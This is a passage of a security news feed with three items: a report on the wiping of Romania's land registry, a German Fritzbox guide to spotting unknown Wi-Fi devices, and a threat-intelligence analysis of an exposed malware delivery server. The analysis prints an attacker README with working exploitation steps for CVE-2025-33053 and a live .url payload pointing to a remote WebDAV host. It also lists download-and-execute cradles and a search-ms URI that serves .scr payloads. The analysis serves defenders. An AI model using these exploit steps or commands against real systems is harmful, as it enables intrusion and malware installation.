veranlassen, weil Eigentumsnachweise und Details aus den Grundakten nicht abrufbar sind. Laut Behörden wird parallel an einer vollständigen Neuaufsetzung der IT-Infrastruktur gearbeitet. […]</p>
<div><a href="https://www.it-boltwise.de/bytetobreach-loescht-rumaenisches-grundbuch-immobilienhandel-steht-still.html">... den vollständigen Artikel <strong>»ByteToBreach löscht rumänisches Grundbuch – Immobilienhandel steht still«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/bytetobreach-loescht-rumaenisches-grundbuch-immobilienhandel-steht-still.html">ByteToBreach löscht rumänisches Grundbuch – Immobilienhandel steht still</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hacker Wipes Romania's Entire Land Registry Database]]></title>
<description><![CDATA[A hacker reportedly wiped Romania's entire land registry database after a failed extortion attempt, halting property transactions across the country and preventing notaries from issuing land extracts, authenticating sales, or registering mortgages. "On the dark web, the hacker also boasted to hav...]]></description>
<link>https://tsecurity.de/de/3681830/it-security-nachrichten/hacker-wipes-romanias-entire-land-registry-database/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681830/it-security-nachrichten/hacker-wipes-romanias-entire-land-registry-database/</guid>
<pubDate>Mon, 20 Jul 2026 19:23:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A hacker reportedly wiped Romania's entire land registry database after a failed extortion attempt, halting property transactions across the country and preventing notaries from issuing land extracts, authenticating sales, or registering mortgages. "On the dark web, the hacker also boasted to have begun backup copies of stolen data in an attempt to prevent it from being restored," reports Cybernews. "However, Romanian officials have managed to at least restore the ANCPI's website and post a message saying they were rebuilding the agency's entire network from scratch. It appears that the agency has an offline copy of the wiped data." From the report: First, the hacker breached Romania's cadastre agency, the National Agency for Cadastre and Real Estate Advertising (ANCPI), posting on a hacking forum: "[RO] Thy arss shall be spanked, Romania! [ANCPI]." "In addition to the data of Romanian citizens, from various databases collected through ANCPI networks, there is also a copy of the GitLab servers containing the source code of all their systems, such as Eterra, RENNS, as well as a version of my little ransomware program," the announcement continued.
 
"The official government website announced a shutdown of IT systems due to 'technical problems,' but this is a bit of an understatement. An offer of assistance was made, but without insistence or pressure." Indeed, the ANCPI initially claimed technical issues but had to admit it was facing a cyberattack. Today, no one can really access the institution's systems. And since the extortion didn't work, the hacker -- who seems to have entered the database using valid credentials -- deleted all data they had stolen, including internal documents, employee credentials, and, of course, land registry data.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Hacker+Wipes+Romania's+Entire+Land+Registry+Database%3A+https%3A%2F%2Fit.slashdot.org%2Fstory%2F26%2F07%2F20%2F172249%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fit.slashdot.org%2Fstory%2F26%2F07%2F20%2F172249%2Fhacker-wipes-romanias-entire-land-registry-database%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://it.slashdot.org/story/26/07/20/172249/hacker-wipes-romanias-entire-land-registry-database?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[So finden Sie fremde Geräte in Ihrem WLAN und werfen diese raus]]></title>
<description><![CDATA[In den allermeisten Fällen lassen sich keine Rückschlüsse aus dem Namen ziehen, mit dem das Gerät in der Netzübersicht des Routers auftaucht: Denn zum Beispiel eine Fritzbox nutzt für die Anzeige üblicherweise den Windows-Computernamen – etwa Desktop-ABC12345 – oder eine Bezeichnung auf Basis der...]]></description>
<link>https://tsecurity.de/de/3681320/windows-tipps/so-finden-sie-fremde-geraete-in-ihrem-wlan-und-werfen-diese-raus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681320/windows-tipps/so-finden-sie-fremde-geraete-in-ihrem-wlan-und-werfen-diese-raus/</guid>
<pubDate>Mon, 20 Jul 2026 15:56:39 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>In den allermeisten Fällen lassen sich keine Rückschlüsse aus dem Namen ziehen, mit dem das Gerät in der Netzübersicht des Routers auftaucht: Denn zum Beispiel eine Fritzbox nutzt für die Anzeige üblicherweise den Windows-Computernamen – etwa Desktop-ABC12345 – oder eine Bezeichnung auf Basis der MAC-Adresse wie zum Beispiel PC-0E-3F-EF-12-F2-20. </p>



<p>Am besten sperren Sie für dieses Gerät zunächst den WLAN-Zugriff: Bei einer Fritzbox gehen Sie hierfür in das Routermenü und klicken unter „Heimnetz –› Netzwerk“ bei dessen Eintrag auf das Stiftsymbol. Im Anschluss daran markieren Sie bitte bei „Internetnutzung“ die Option „Gerät gesperrt“.</p>



<p>Möglicherweise klärt sich schon damit die Identität des Gerätes – beispielsweise wenn plötzlich die Musik aus dem smarten Lautsprecher verstummt oder die Sicherheitskamera Ihnen meldet, dass sie keine Verbindung mehr zum Netzwerk hat.</p>



<p>In der Routerliste der aktiven Geräte sollte beim neuen Gerät auch dessen aktuelle IP-Adresse im Heimnetz stehen: Geben Sie sie im Browser ein, um die Weboberfläche des Gerätes zu erreichen. Dazu müssen Sie zuvor kurzfristig die WLAN-Sperre aufheben. Eventuell öffnet sich nun der Zugang zum Gerätemenü, an dem Sie Hersteller oder Modell erkennen. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5e28fe9471e"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/04/pcw05_MAC-Filter_RGBeci.jpg?quality=50&amp;strip=all" alt="MAC-Filter " class="wp-image-2662247" width="1024" height="604" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Mit einem MAC-Filter lassen sich unerlaubte Anmeldungen im WLAN erschweren, aber nicht komplett ausschließen, denn Profis können ihn umgehen.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Als Nächstes sollten Sie anhand der MAC-Adresse des Gerätes versuchen, weitere Informationen zu Hersteller oder Produkttyp zu bekommen. In der Fritzbox finden Sie die MAC-Adresse unter „Heimnetz –› Netzwerk –› Netzwerkverbindungen“ in der entsprechenden Spalte. Kopieren Sie diese, um sie in einer Webseite einzutragen, die daraus den Herstellernamen berechnen kann – etwa <a href="http://www.deinip-check.de/tools/macfinder" target="_blank" rel="noreferrer noopener">www.deinip-check.de/tools/macfinder</a>. </p>



<p>Diese Information kann ein Hinweis auf die wahre Identität des Gerätes sein, ist jedoch kein unumstößlicher Beweis: Denn Angreifer können mithilfe von einfachen Softwaretools die echte MAC-Adresse eines Geräts verschleiern und es stattdessen mit einer anderen versehen – zum Beispiel einer MAC-Adresse, die im Heimnetz bekannt und daher unverdächtig ist. </p>



<p>Der nächste Schritt sollte Sie ins Ereignisprotokoll des Routers führen – in der Fritzbox finden Sie dieses unter „System –› Ereignisse.“ Hier sehen Sie etwa, wann sich das Gerät bislang im Netzwerk an- und abgemeldet hat. </p>



<p>Möglicherweise lässt sich aus diesem Verhalten und dem Zeitraum der Netzwerkaktivität erkennen, um welches Gerät es sich handelt oder welche Person es im Heimnetz nutzt. Wenn sich das Gerät mit dem WLAN verbindet, sollte das Routerprotokoll außerdem festhalten, welchen WLAN-Standard und welche Bitrate es verwendet: </p>



<p>Eine niedrige Verbindungsgeschwindigkeit kann bedeuten, dass das Gerät weiter vom Router entfernt ist oder dass es sich beispielsweise um eine Smart-Home-Komponente handelt.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5e28fe95158"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/04/pcw05_Fremdes-Gerat_RGBeci.jpg?quality=50&amp;strip=all" alt="Ereignisse" class="wp-image-2662248" width="1024" height="312" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Wenn ein unbekanntes Gerät im WLAN auftaucht, bietet ein Router wie die Fritzbox zahlreiche Möglichkeiten, es zu identifizieren.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Um zukünftig schnell auf neue Heimnetzgeräte aufmerksam zu werden, sollten Sie im Router eine Push-Benachrichtigung aktivieren. Bei einer Fritzbox erledigen Sie dies unter „System –› Push Service“. Nachdem Sie eine passende E-Mail-Adresse hinterlegt haben, unter welcher Sie die Fritzbox erreicht, sollten Sie die Option „Änderungsnotiz“ aktivieren. </p>



<p>Mit einem MAC-Filter können Sie grundsätzlich verhindern, dass sich neue Geräte im Heimnetz anmelden: In der Fritzbox aktivieren Sie ihn unter „WLAN –› Sicherheit –› Verschlüsselung.“ </p>



<p>Klicken Sie im Folgenden unten auf dieser Seite auf den blauen Schriftzug „WLAN-Zugang beschränken“ sowie anschließend weiter unten auf „WLAN-Zugang auf die bekannten WLAN-Geräte beschränken“. Ihnen unbekannte Geräte dürfen hierbei nicht in der Liste darüber auftauchen, andernfalls wird sie der MAC-Filter nicht blockieren.</p>



<p>Auch hier gelten die erwähnten Einschränkungen: Ein ernsthafter Angreifer kann für sein Gerät eine erlaubte MAC-Adresse übernehmen und damit den Filter umgehen. Zudem müssen Sie dann künftig auch jedes neue erlaubte Gerät in den MAC-Filter eintragen, was in der Fritzbox über die Schaltfläche „WLAN-Gerät hinzufügen“ funktioniert. Um eine regelmäßige Kontrolle der Aktivitäten im Heimnetz kommen Sie daher nicht herum, wenn Sie zuverlässig fremde Geräte entdecken wollen.</p>



<p><a href="https://www.pcwelt.de/article/1148838/wlan-router-absichern-wifi-6-wifi-7.html">WLAN-Schutz 2025: So sichern Sie Ihren Router ab</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[From a Single Alert to 1,000 Files: Inside an Exposed WebDAV Malware Delivery Lab]]></title>
<description><![CDATA[Executive summaryAn MDR alert recently led our team to an exposed server that was doing more than hosting payloads. It was functioning as a fully operational malware delivery lab. Containing over 1,000 artifacts, the infrastructure served as a QA hub where attackers systematically tested delivery...]]></description>
<link>https://tsecurity.de/de/3681303/it-security-nachrichten/from-a-single-alert-to-1000-files-inside-an-exposed-webdav-malware-delivery-lab/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681303/it-security-nachrichten/from-a-single-alert-to-1000-files-inside-an-exposed-webdav-malware-delivery-lab/</guid>
<pubDate>Mon, 20 Jul 2026 15:53:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Executive summary</h2><p><span>An MDR alert recently led our team to an exposed server that was doing more than hosting payloads. It was functioning as a fully operational malware delivery lab. Containing over 1,000 artifacts, the infrastructure served as a QA hub where attackers systematically tested delivery paths, social engineering lures, and WebDAV execution methods.</span></p><p><span>Our analysis reveals an interesting shift in adversary operations: attackers are adopting generative AI to move beyond individual exploits and operate like modern software product teams. By leveraging LLMs for rapid lure generation, detailed README documentation, and automated testing, they are significantly accelerating their development cycle.</span></p><p><span>This incident underscores the imperative of preemptive security. By unifying exposure management with detection and response, we did not just catch a single campaign; we gained visibility into the attacker’s entire delivery pipeline. Although the server hosted many malware samples, the more interesting find was the view into the attacker’s workflow. The exposed infrastructure showed how the operator tested delivery paths, packaged lures, staged payloads, and monitored delivery activity. All of it with the help of generative AI.</span></p><h2>Introduction: From MDR alert to attacker infrastructure</h2><p><span>The investigation started with an MDR alert after a user executed a file pulled from a WebDAV server using </span><span><span data-type="inlineCode">rundll32.exe</span></span><span>. Telemetry showed the WebClient service starting, followed by </span><span><span data-type="inlineCode">davclnt.dll</span></span><span> reaching out to a remote host to retrieve content.</span></p><p><span>That initial hit led us to dig deeper into the delivery setup, which is how we ended up finding an exposed directory. It quickly became clear to us that the server wasn't just hosting files, but also was used as an active malware testing and delivery hub. Alongside payloads, we found bulk-generated shortcut lures, URL-based execution tests, ClickFix pages, WebDAV initialization scripts, droppers, spoofed filenames, and operator notes.</span></p><p><span>At a high level, the 1,048 files clustered as follows:</span></p><p><span></span></p><table><colgroup data-width="1566"><col><col><col></colgroup><tbody><tr><td><p><span><strong>Category</strong></span></p></td><td><p><span><strong>Files</strong></span></p></td><td><p><span><strong>Functions and discoveries</strong></span></p></td></tr><tr><td><p><span>LNK delivery launchers</span></p></td><td><p><span>453</span></p></td><td><p><span>Bulk-generated shortcut lures using document themes, spoofed filenames, fake icons, and multiple execution paths</span></p></td></tr><tr><td><p><span>Filename-spoofing QA</span></p></td><td><p><span>236</span></p></td><td><p><span>Tests for Unicode, double-extension, padding, and browser/Explorer rendering behavior</span></p></td></tr><tr><td><p><span>URL/LOLBin execution tests</span></p></td><td><p><span>146</span></p></td><td><p><span>Experiments with signed Windows binaries, remote working directories, and WebDAV-style execution</span></p></td></tr><tr><td><p><span>Encrypted droppers</span></p></td><td><p><span>89</span></p></td><td><p><span>Staged second-stage payloads and installer-style packages</span></p></td></tr><tr><td><p><span>Alternative execution containers</span></p></td><td><p><span>24</span></p></td><td><p><span><span data-type="inlineCode">search-ms</span></span><span>, </span><span><span data-type="inlineCode">library-ms</span></span><span>, </span><span><span data-type="inlineCode">.cpl</span></span><span>, and related delivery containers</span></p></td></tr><tr><td><p><span>Payload stubs and spoofed executables</span></p></td><td><p><span>21</span></p></td><td><p><span>Smaller loaders, decoys, and renamed binaries</span></p></td></tr><tr><td><p><span>WebDAV scripts</span></p></td><td><p><span>17</span></p></td><td><p><span>Scripts intended to make WebDAV delivery more reliable on Windows systems</span></p></td></tr><tr><td><p><span>Builder and operator notes</span></p></td><td><p><span>10</span></p></td><td><p><span><span data-type="inlineCode">README</span></span><span> files, test reports, mappings, and generation scripts</span></p></td></tr><tr><td><p><span>ClickFix HTML lures</span></p></td><td><p><span>9</span></p></td><td><p><span>Browser-based social-engineering pages instructing users to run commands</span></p></td></tr><tr><td><p><span>Miscellaneous files</span></p></td><td><p><span>6</span></p></td><td><p><span>Included documentation for the actor’s WebDAV delivery/admin panel</span></p></td></tr></tbody></table><p><span><em>Table 1: Breakdown of files recovered from the attacker’s delivery workspace</em></span></p><h2><span>Technical analysis and observed attacker behavior</span></h2><h3>Attackers testing like a product team</h3><p><span>The open directory exposed the attacker’s payloads and testing process. The collection varied by function: some folders stored payloads, while others isolated individual delivery methods, including WebDAV, UNC paths, </span><span><span data-type="inlineCode">search-ms</span></span><span>, </span><span><span data-type="inlineCode">library-ms</span></span><span>, Control Panel items, and trusted Windows binaries. Several directories appeared to be QA areas for testing how lures are rendered in browsers and Windows Explorer. These tests included Unicode spoofing, right-to-left override (RTLO) characters, double extensions, and padding tricks used to make executables look like documents.</span></p><p><span>The directory also contained several README files. Their structure and phrasing suggested they may have been generated with LLMs. Some folders were named </span><span><span data-type="inlineCode">testik</span></span><span> and </span><span><span data-type="inlineCode">testik2</span></span><span>, a Russian diminutive form of “test”.</span></p><p><span></span></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltbc6d4a9f8e6c1e40/6a5e1283f480d89435286a73/testing-files-subfolders.png" alt="testing-files-subfolders.png" caption="Figure 1: Snippet of one of many subfolders containing testing files." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="testing-files-subfolders.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltbc6d4a9f8e6c1e40/6a5e1283f480d89435286a73/testing-files-subfolders.png" data-sys-asset-uid="bltbc6d4a9f8e6c1e40" data-sys-asset-filename="testing-files-subfolders.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 1: Snippet of one of many subfolders containing testing files." data-sys-asset-alt="testing-files-subfolders.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 1: Snippet of one of many subfolders containing testing files.</figcaption></div></figure><p>⠀</p><p><span>Looking at the artifacts from the open directory, we saw that the attacker was testing some specific CVEs.</span></p><p><span></span></p><table><colgroup data-width="1901"><col><col><col></colgroup><tbody><tr><td><p><span><strong>CVE</strong></span></p></td><td><p><span><strong>Observed samples</strong></span></p></td><td><p><span><strong>Short description</strong></span></p></td></tr><tr><td><p><span>CVE-2025-33053</span></p></td><td><p><span>11</span></p></td><td><p><span>Windows Internet Shortcut flaw involving external control of a file name or path, allowing code execution over a network. (</span><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-33053?utm_source=chatgpt.com" target="_blank"><span>nvd.nist.gov</span></a><span>)</span></p></td></tr><tr><td><p><span>CVE-2026-21513</span></p></td><td><p><span>4</span></p></td><td><p><span>MSHTML Framework security feature bypass caused by protection-mechanism failure. (</span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-21513?utm_source=chatgpt.com" target="_blank"><span>nvd.nist.gov</span></a><span>)</span></p></td></tr><tr><td><p><span>CVE-2025-24054</span></p></td><td><p><span>1</span></p></td><td><p><span>Windows NTLM spoofing issue where crafted file/path handling can trigger outbound authentication and leak NTLM material; observed tradecraft commonly involved </span><span><span data-type="inlineCode">.library-ms</span></span><span> files. (</span><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-24054?utm_source=chatgpt.com" target="_blank"><span>nvd.nist.gov</span></a><span>)</span></p></td></tr></tbody></table><p><span><em>Table 2: CVE references observed in the exposed directory.</em></span></p><p></p><p><span>The most developed test set focused on </span><span>CVE-2025-33053,</span><span> the working-directory abuse technique reported by Check Point in its analysis of Stealth Falcon activity. It appears as though the threat was trying to reproduce or adapt the reported technique with the help from README that appears to have been generated with LLMs. At a high level, the technique abuses </span><span><span data-type="inlineCode">.url</span></span><span> shortcut behavior to launch a legitimate signed Windows binary while setting its working directory to an attacker-controlled WebDAV share. In the original reporting, the binary was </span><span><span data-type="inlineCode">iediagcmd.exe</span></span><span>, an Internet Explorer diagnostics utility. When invoked, that utility launches several child processes by name. If the working directory points to a remote WebDAV location controlled by the attacker, Windows may resolve those child process names from the remote share instead of the expected local system directory.</span></p><p><span>The README files closely mirrored this logic. They called out </span><span><span data-type="inlineCode">iediagcmd.exe</span></span><span> as the preferred binary, referenced the same WebDAV working-directory pattern described in the Stealth Falcon reporting, and preserved the previously reported </span><span><span data-type="inlineCode">summerartcamp.net@ssl@443\DavWWWRoot\OSYxaOjr</span></span><span> path as an example. So if you ever wonder who reads your blogs, it seems like attackers do.</span></p><p></p><pre language="c">CVE-2025-33053 (Stealth Falcon APT) - Test Setup
=====================================================

WHAT IS THIS?
This .url file abuses iediagcmd.exe to execute a file from WebDAV
WITHOUT any security warnings. Zero alerts!

HOW IT WORKS:
1. .url file contains URL=path to iediagcmd.exe (legitimate IE tool)
2. .url sets WorkingDirectory to WebDAV share
3. When clicked: iediagcmd.exe starts with cwd = WebDAV
4. iediagcmd internally calls: route.exe, ipconfig.exe, netsh.exe, ping.exe
5. Process.Start() searches in working directory FIRST
6. WebClient auto-starts when accessing WebDAV
7. Attacker's route.exe (renamed putty.exe) runs from WebDAV
8. NO SmartScreen, NO MoTW warnings!

REQUIREMENTS TO MAKE TEST WORK:
================================

1. iediagcmd.exe MUST exist on victim machine
   Path: C:\Program Files\Internet Explorer\iediagcmd.exe
   - Win10 (1607-22H2):        YES
   - Win11 21H2/22H2/23H2:     usually YES
   - Win11 24H2 (IE removed):  NO (this is why your F-series failed!)
   - Check on victim:
     dir "C:\Program Files\Internet Explorer\iediagcmd.exe"

2. WebDAV MUST have file named EXACTLY "route.exe"
   NOT putty.exe! iediagcmd will only execute these names:
   - route.exe
   - ipconfig.exe
   - netsh.exe
   - ping.exe
   On your WebDAV server, RENAME putty.exe to route.exe
   Place at: \\TA_C2\Downloads\route.exe

3. Microsoft patch from June 2025 MUST NOT be installed
   Check: Get-HotFix | Where-Object {$_.HotFixID -match "KB5060"}
   If patched, exploit fails.

ALTERNATIVE LOLBINS (if iediagcmd.exe missing):
================================================
F4_CustomShellHost_explorer.url - uses CustomShellHost.exe
   (mentioned in CheckPoint report - spawns explorer.exe)
F5_OfficeC2RClient_alternative.url - uses Office C2R client
   (if Office is installed)

REAL ATTACK PAYLOAD WAS:
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\summerartcamp.net@ssl@443\DavWWWRoot\OSYxaOjr
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D</pre><p language="html"><span><em>Figure 2: Contents of README, likely generated by LLM, found in the exposed directory.</em></span><em><br></em>⠀</p><p><span>The testing approach was methodical and included the below:</span></p><p><span><strong>Transports</strong></span><span>: WebDAV over </span><span><span data-type="inlineCode">@80</span></span><span> and </span><span><span data-type="inlineCode">@ssl@443</span></span></p><p><span><strong>Path formats</strong></span><span>: </span><span><span data-type="inlineCode">DavWWWRoot</span></span><span> vs. plain UNC</span></p><p><span><strong>Fallback LOLBins</strong></span><span>: </span><span><span data-type="inlineCode">CustomShellHost.exe</span></span><span>, </span><span><span data-type="inlineCode">OfficeC2RClient.exe</span></span><span>, and many more for hosts where </span><span><span data-type="inlineCode">iediagcmd.exe</span></span><span> is absent</span></p><p><span><strong>Download cradles</strong></span><span>: </span><span><span data-type="inlineCode">bitsadmin /transfer</span></span><span>, </span><span><span data-type="inlineCode">certutil -urlcache -split -f</span></span><span>, </span><span><span data-type="inlineCode">mshta http(s)://…</span></span></p><p><span><strong>Shortcut launchers</strong></span><span>: PowerShell </span><span><span data-type="inlineCode">IEX (New-Object Net.WebClient).DownloadString(...)</span></span><span>, hidden/minimized windows</span></p><p><span><strong>Explorer containers</strong></span><span>: </span><span><span data-type="inlineCode">search-ms:</span></span><span> queries and </span><span><span data-type="inlineCode">.library-ms</span></span><span> files exposing remote payloads</span></p><p><span><strong>ClickFix pages</strong></span><span>: relying on user copy/paste execution</span></p><p><span><strong>Filename spoofing</strong></span><span>: RTLO (U+202E), double extensions, and whitespace padding before </span><span><span data-type="inlineCode">.exe</span></span><span> / </span><span><span data-type="inlineCode">.scr</span></span></p><h2>The lure factory</h2><p><span>The lure themes were broad and familiar: invoices, privacy policies, contracts, signed documents, finance reports, Labcorp-themed reports, salary statements, and notification policies.</span></p><p><span>Judging by the lure themes, we concluded that the attacker is targeting enterprise Windows users who are likely to open routine documents.</span></p><p><span>The threat actor also invested heavily in making files look “safe”. Many lure names mimicked PDFs or office documents. Others used fake icons associated with common software. Some attempted to hide arguments or launch windows minimized. Clearly, the goal was to make malicious execution feel like ordinary document handling.</span></p><p><span>The directory also contained ClickFix HTML lures. These pages mimicked familiar services, application errors, and document-access workflows to convince users to copy and run a command. The lures were disguised as Cloudflare verification checks, Adobe or Word document errors, Microsoft login pages, Chrome update messages, and Discord-themed notices. Filenames such as </span><span><span data-type="inlineCode">Fix_Connection_Error.html</span></span><span>, </span><span><span data-type="inlineCode">Update_Required.html</span></span><span>, </span><span><span data-type="inlineCode">Secure_Document_Access.html</span></span><span>, </span><span><span data-type="inlineCode">Verification_Failed.html</span></span><span>, and </span><span><span data-type="inlineCode">Open_Document_Instructions.html</span></span><span> show how the actor repackaged the same execution pattern under different social-engineering themes.</span></p><p><span>The commands typically launched PowerShell to fetch remote content, used </span><span><span data-type="inlineCode">cmd.exe</span></span><span> to open payloads from WebDAV or UNC paths, or used utilities like </span><span><span data-type="inlineCode">rundll32</span></span><span> and </span><span><span data-type="inlineCode">mshta</span></span><span> to proxy execution. Many referenced attacker-controlled paths, temporary directories, hidden windows, or encoded arguments to reduce visibility.</span></p><h2>The payload chains </h2><p><span>The exposed directory contained many payloads, but we did not reverse every binary in the collection. We initially started with reverse engineering, but after analyzing several chains, we found repeated packaging patterns and suspected that some staged files may have led to the same or closely related final payloads.</span></p><p><span>We therefore shifted from exhaustive reverse engineering to triage. We reviewed several files, including </span><span><span data-type="inlineCode">DlrtyGames</span></span><span>, </span><span><span data-type="inlineCode">CursorSetup</span></span><span>, </span><span><span data-type="inlineCode">ReportFinal.rsc.pdf</span></span><span>, </span><span><span data-type="inlineCode">ReportFina.exe</span></span><span> and </span><span><span data-type="inlineCode">pdfgear_setup_v2.1.16.exe</span></span><span>, and prioritized payloads that either represented distinct delivery approaches or were tied to observed campaign activity.</span></p><p><span>Our main focus became the most commonly delivered file in the most recent CURP campaign, based on artifacts we found in cPanel. This gave us the clearest link between the exposed delivery infrastructure and active campaign activity. </span></p><p><span>This scope is intentional. This post is about the attacker’s delivery workflow, not a full reverse-engineering report for every sample in the directory. We use the payload analysis to show how the operator packaged lures, staged loaders, tested execution methods, and moved from delivery to final payload execution. </span></p><h2><span>Case study 1: CURP campaign targeting Mexico</span></h2><p><span>Our MDR alert began with a user who landed on the phishing site </span><span><span data-type="inlineCode">www[.]gobf[.]mx</span></span><span>, a typosquat impersonating the Mexican government's CURP (Clave Única de Registro de Población) national-ID lookup service at </span><a href="https://www.gob.mx/curp/" target="_blank"><span>https://www.gob.mx/curp/</span></a><span>. The phishing site presented a convincing single-page application that asked victims to enter CURP identity data and retrieve an official record.</span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc4d4e8c3f881bba8/6a5e14ba2ee1c1e5373aea06/Phishing-page-impersonating-Mexico%E2%80%99s-CURP-lookup-service.png" alt="Phishing-page-impersonating-Mexico’s-CURP-lookup-service.png" caption="Figure 3: Phishing page impersonating Mexico’s CURP lookup service, with browser developer tools showing the embedded WebDAV delivery logic." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Phishing-page-impersonating-Mexico’s-CURP-lookup-service.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc4d4e8c3f881bba8/6a5e14ba2ee1c1e5373aea06/Phishing-page-impersonating-Mexico’s-CURP-lookup-service.png" data-sys-asset-uid="bltc4d4e8c3f881bba8" data-sys-asset-filename="Phishing-page-impersonating-Mexico’s-CURP-lookup-service.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 3: Phishing page impersonating Mexico’s CURP lookup service, with browser developer tools showing the embedded WebDAV delivery logic." data-sys-asset-alt="Phishing-page-impersonating-Mexico’s-CURP-lookup-service.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 3: Phishing page impersonating Mexico’s CURP lookup service, with browser developer tools showing the embedded WebDAV delivery logic.</figcaption></div></figure><p>⠀</p><p><span>The site’s client-side JavaScript handled the fake ID lookup flow and then triggered payload delivery when the victim clicked the download button. Instead of downloading a PDF directly, the script invoked a </span><span><span data-type="inlineCode">search-ms:</span></span><span> URI that opened the operator’s remote WebDAV share as a Windows Explorer search view filtered to </span><span><span data-type="inlineCode">.scr</span></span><span> files:</span></p><p><span></span></p><pre language="c">search-ms:displayname=Search Results in \\onedrive.cv@80\Downloads\CURP
         &amp;query=*.scr
